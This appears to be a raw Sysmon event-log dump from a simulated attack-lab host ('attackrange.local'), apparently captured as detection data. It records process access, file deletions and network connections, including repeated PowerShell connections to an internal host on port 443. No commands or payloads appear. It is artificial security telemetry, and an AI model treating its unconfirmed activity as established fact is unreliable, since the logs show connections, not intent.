1781 10341000x800000000000000035342840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:32.428{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:32.428{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-734C-613B-44B4-03000000C801}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:32.428{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-734C-613B-44B4-03000000C801}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:32.413{B81B27B7-734C-613B-44B4-03000000C801}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:32.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DED94BD20799456C529C535D2FE4622F,SHA256=32EC98E9D8C85DE5CD7D3C43D56FB72EF553CD539E7D7DAF74E0FD092E426421,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:32.166{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=688CA914893E0F8B51C92770FCEEFA54,SHA256=D456644429AD07A6DC4404DB9B0BE0006CF2DE5C495620E76727969F2FF7F06B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:32.166{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5980FD26E2323C35272208A43BC2FE7B,SHA256=269DEB9FBC9F85B5DD5F3B305B9A2A240E175A39072012E66D43DFCEEE606550,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:32.012{B81B27B7-734B-613B-43B4-03000000C801}69082056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:33.426{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=688CA914893E0F8B51C92770FCEEFA54,SHA256=D456644429AD07A6DC4404DB9B0BE0006CF2DE5C495620E76727969F2FF7F06B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:33.364{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C538DBDEEB8E59BFD60D3A3F574CAC5,SHA256=F02CCBAA76EDFA23323947985DCABBBC243488D899124B51BC12687100A26035,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.613{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52474-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035342849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.128{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52473-false10.0.1.12-8000- 23542300x800000000000000035342848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:34.679{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=64C53B6C6A3B7EBC63EED13088C3E365,SHA256=4D18D57A3118AD421AB6B8CD925E2F322137F686AEF019978E3875B4B4B0524D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:34.379{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2338CDF44E82A0ED58B9E44AAFA4EDA8,SHA256=B6488CD0E7D04E68DB2338BA27993956B846B2F79E7833DD13072B7433AB5219,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:35.393{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A734DB20EB373AFE4B8FBA0E9E298C0,SHA256=E8F556E58D275C3CD30880EED5FA0B85498F588F64F25BF14FF0492011C30BC2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:36.579{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF75f8a470.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:36.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F18F45369A1EADCBA24F5374D394A16,SHA256=3A84EF0FD4A51D94A63501500D8A38783100F91B09638432CAB3DF44FF25153F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:37.411{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9D6F45D55111338104C8D43BA0682FA,SHA256=F68FA2BF46DEC6364E8FB3076AC8FC6C70C0CFEFCFD45C5DD77851A94D8B453E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:38.847{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9C0F2396126A0A19EBA7C234D5D92D9F,SHA256=CE8FCDDF5A58BDA87AA4581EAEB725E6028E576F5DA81457DBC562B2FDF17633,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:38.444{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB801EAB8E6FE9447D2175E8155E9BBF,SHA256=06621F6F160730165FC280CDF6AEE61BC27459F6182DFFEE0A8AF79DFD8C7BB1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:39.463{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4754A07247B2BFE1B3A2A1D6A6D57627,SHA256=66272AB9C2BF0A9D930CF6CB2EC29036E451C36AC8EAB5663127C640445EF08B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:40.493{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=271FABED2EAF66F9E9A2BBBC9E653204,SHA256=40146E710D45A1FDF5EA0C3982168FAAB80DA05730F18F372025CB20892D40C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:05.247{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52476-false10.0.1.12-8000- 354300x800000000000000035342858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.613{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52475-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:41.508{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40EF09886782D2BD7BCADB11CD815549,SHA256=799B6D85E193878FA7464321967288F56D215A317A4E86133DF48329336B39C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:08.626{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52477-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:42.642{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=776B2091877E62147427AF14CB32C715,SHA256=930A620CC02C25ACC73A8814F5C5CFDF65620FF8CB3A0798615B9A3D1B16F2CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:42.592{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21EEA01D335223227AC8F45F0C6B85AC,SHA256=354E0F157DF3933527D2FCC2D686D2EEDB2C4645FCCDEFBBFED78A9D357CED79,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:43.603{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB6C76F91056D8F78B28F2F8120A4A29,SHA256=2B3A4AA2714472095A05F8181C703EEFA64E4CD2F5DC423DD6423B6035B23E34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:44.890{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=8BD25DB0548D52A889E2A54B36AA4A2C,SHA256=D5FCAFFB0F5D8733D2964FB68282FDD73FC164C32791DE1B8CEB0DF6DAFFC45B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:44.639{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08B9EE3164832B54548EEFF81B3160E2,SHA256=2892200F344C76723EF4D937BF0FDA8032E8B4954410154784CA6D6E0016A13F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:45.643{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC5020F954344CBDE865A2FC6345141B,SHA256=3E72A0664160E0B35217040CA3C51D9681A45B3CB73FB14398B52780AFA1C0CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:11.092{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52478-false10.0.1.12-8000- 23542300x800000000000000035342869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:46.675{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE9D0EC52D723BA052550CF4D4CE5A3E,SHA256=EF6DF3A31C000678F20B327574EB03D9EFAA5A43FDDABA18ABCC2098A5A286B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:47.690{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D660287DD928B9EB775FB09181AAC99E,SHA256=2A921076E419626F69C720AAA201902C634B43D84D56CE71F59ECA3DB0081D03,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:48.857{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CAFAA55E0E790F90C0F6F64F4515D538,SHA256=C3038EAA8F18C829A8CCDEE23079552D59D50CD45303978EC2422CE436DBCE0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:48.704{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E645204E0497EE9EAE06631BF1DD39B,SHA256=229FFD06C37D7CB444944C4E42D3ACA73F5432366A97479F48FBBC5012515223,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:49.738{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E271C47A31C2240F64782FD5FDD8233D,SHA256=759D58766B078CF2D7C56AF59FBA21C5AF6983BD378038D8B9423F037254CD5F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:14.639{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52479-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:50.755{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C3EC6255006D0A19537C50D6D5D913E,SHA256=527B566984C4C2F2276289E9E9BBB7A43ADDE119F62009A85F7A7105CF8E2F28,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:51.801{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A6087772CAFFEB4A8F114A3E944F715,SHA256=81CF1A2AD924586D148176687FC9B719DD52942B582302BB56604CDE8DB452D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:52.815{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE2CDD57D3CB3BA17E1C6C634553323E,SHA256=071AA0E06A3FA52699F93BAD1590807637BC8BCB84817288C7E4C18F71795DEF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:16.221{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52480-false10.0.1.12-8000- 23542300x800000000000000035342881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:53.901{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=513C0FC22E831A0ABE6BE273291D4F3A,SHA256=658C7D12D373FA919C4C755806F70A0F59A76DE577AB64CB730E8212B67812B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:53.886{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B034139721987CAE2A790103EA6875F7,SHA256=AA2A4D35C93FA5A5DC98286E5A39DF833061B34AF060749D02E1C70ACB5D4F4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:54.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB4FF25815E41B59EB6548AE6E228DB9,SHA256=7038B06ABD6B1E5737774BA5FB6BDFD171EA6517B443E4E6FDA405BD69927711,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:19.655{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52481-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:55.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B2B3F8B41E643199B1D409E6CA7986C,SHA256=001F21A0ACCE58CE3056DE90C14557C6130692162AA9B1AADEF1C0D03CDD26A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:56.932{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 